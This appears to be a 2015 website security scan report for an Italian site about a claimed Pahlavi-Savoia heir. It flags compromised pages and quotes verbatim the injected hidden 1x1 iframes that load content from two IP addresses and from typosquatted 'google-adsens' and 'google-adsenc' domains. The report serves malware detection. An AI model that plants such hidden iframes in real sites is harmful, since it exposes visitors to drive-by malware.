Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lastoriaincredibile.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://lastoriaincredibile.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:03 GMT Location: http://www.lastoriaincredibile.org/ Server: Apache Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lastoriaincredibile.org/ | 200 OK Content-Length: 5792 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 91.142.214.164 <html> <head> <title>Monhud Palhevi Savoia - La storia incredibile</title> <meta name="AUTHOR" content="monhud.inchallah@palhevisavoia.org"> <meta name="description" content="La storia del figlio legittimo dello SciĆ di Persia Reza Pahlavi e della Principessa Maria Gabriella di Savoia"> <meta name="keywords" content="Pahlavi, Savoia, Monhud, Pahlevi, Palhevi, Persia, Iran, Teheran, Golestan, Go ...[4334 bytes skipped]... Hidden iFrame found. size: 1x1 src: http://31.184.242.81/link.php <iframe src=http://31.184.242.81/link.php width=1 height=1 frameborder=0> Malicious iFrame found. The same iFrame was found in 45 websites. size: 1x1 src: http://91.142.214.164/cache/link.php This URL is marked by Google as suspicious <iframe src=http://91.142.214.164/cache/link.php width=1 height=1 frameborder=0> | ||
http://www.lastoriaincredibile.org/home.php | 200 OK Content-Length: 51263 Content-Type: text/html | clean |
http://www.lastoriaincredibile.org/script/data.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.lastoriaincredibile.org/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.lastoriaincredibile.org/script/home2a.js | 404 Not Found Content-Length: 214 Content-Type: text/html | clean |
http://www.lastoriaincredibile.org/script/home2.js | 404 Not Found Content-Length: 213 Content-Type: text/html | clean |
http://lastoriaincredibile.org/vita.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:05 GMT Location: http://www.lastoriaincredibile.org/vita.php Server: Apache Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lastoriaincredibile.org/vita.php | 200 OK Content-Length: 47164 Content-Type: text/html | clean |
http://www.lastoriaincredibile.org/script/espandi.js | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://lastoriaincredibile.org/script/home2a.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:05 GMT Location: http://www.lastoriaincredibile.org/script/home2a.js Server: Apache Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 | clean |
http://lastoriaincredibile.org/script/home2.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:06 GMT Location: http://www.lastoriaincredibile.org/script/home2.js Server: Apache Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 | clean |
http://lastoriaincredibile.org/tribunali.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:06 GMT Location: http://www.lastoriaincredibile.org/tribunali.php Server: Apache Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lastoriaincredibile.org/tribunali.php | 200 OK Content-Length: 61464 Content-Type: text/html | clean |
http://lastoriaincredibile.org/inglese/home.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:07 GMT Location: http://www.lastoriaincredibile.org/inglese/home.php Server: Apache Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lastoriaincredibile.org/inglese/home.php | 200 OK Content-Length: 52849 Content-Type: text/html | clean |
http://www.lastoriaincredibile.org/inglese/script/data.js | 404 Not Found Content-Length: 220 Content-Type: text/html | clean |
http://lastoriaincredibile.org/inglese/script/home2a.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:08 GMT Location: http://www.lastoriaincredibile.org/inglese/script/home2a.js Server: Apache Content-Length: 267 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lastoriaincredibile.org/inglese/script/home2a.js | 200 OK Content-Length: 11015 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var NoOffFirstLineMenus=10; var LowBgColor='#FFFF33'; var LowSubBgColor='#FFFF33'; var HighBgColor='#000066'; var HighSubBgColor='#000066'; var FontLowColor='#000066'; var FontSubLowColor='#000066'; var FontHighColor='white'; var FontSubHighColor='white'; var BorderColor='#990000'; var BorderSubColor='#990000'; var BorderWidth=1; var BorderBtwnElmnts=1; var FontFamily="arial,comic sans ms,technical" var FontSize=9; var FontBold=1; var FontItalic=0 Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://google-adsens.com/in.cgi?2 <iframe src="http://google-adsens.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> Hidden iFrame found. size: 1x1 src: http://google-adsenc.com/in.cgi?2 <iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> | ||
http://lastoriaincredibile.org/inglese/script/home2.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:07 GMT Location: http://www.lastoriaincredibile.org/inglese/script/home2.js Server: Apache Content-Length: 266 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lastoriaincredibile.org/inglese/script/home2.js | 200 OK Content-Length: 26899 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var AgntUsr=navigator.userAgent.toLowerCase(); var DomYes=document.getElementById?1:0; var NavYes=AgntUsr.indexOf('mozilla')!=-1&&AgntUsr.indexOf('compatible')==-1?1:0; var ExpYes=AgntUsr.indexOf('msie')!=-1?1:0; var Opr=AgntUsr.indexOf('opera')!=-1?1:0; var Opr6orless=window.opera && navigator.userAgent.search(/opera.[1-6]/i)!=-1 var DomNav=DomYes&&NavYes?1:0; var DomExp=DomYes&&ExpYes?1:0; var Nav4=NavYes&&!DomYes& Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://google-adsenc.com/in.cgi?2 <iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> Hidden iFrame found. size: 1x1 src: http://google-adsens.com/in.cgi?2 <iframe src="http://google-adsens.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lastoriaincredibile.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 11 Jan 2015 05:58:03 GMT
Location: http://www.lastoriaincredibile.org/
Server: Apache
Content-Length: 243
Content-Type: text/html; charset=iso-8859-1
...243 bytes of data.
GET / HTTP/1.1
Host: lastoriaincredibile.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 11 Jan 2015 05:58:03 GMT
Location: http://www.lastoriaincredibile.org/
Server: Apache
Content-Length: 243
Content-Type: text/html; charset=iso-8859-1
...243 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lastoriaincredibile.org
Referer: http://www.google.com/search?q=lastoriaincredibile.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lastoriaincredibile.org
Referer: http://www.google.com/search?q=lastoriaincredibile.org
Result:
The result is similar to the first query. There are no suspicious redirects found.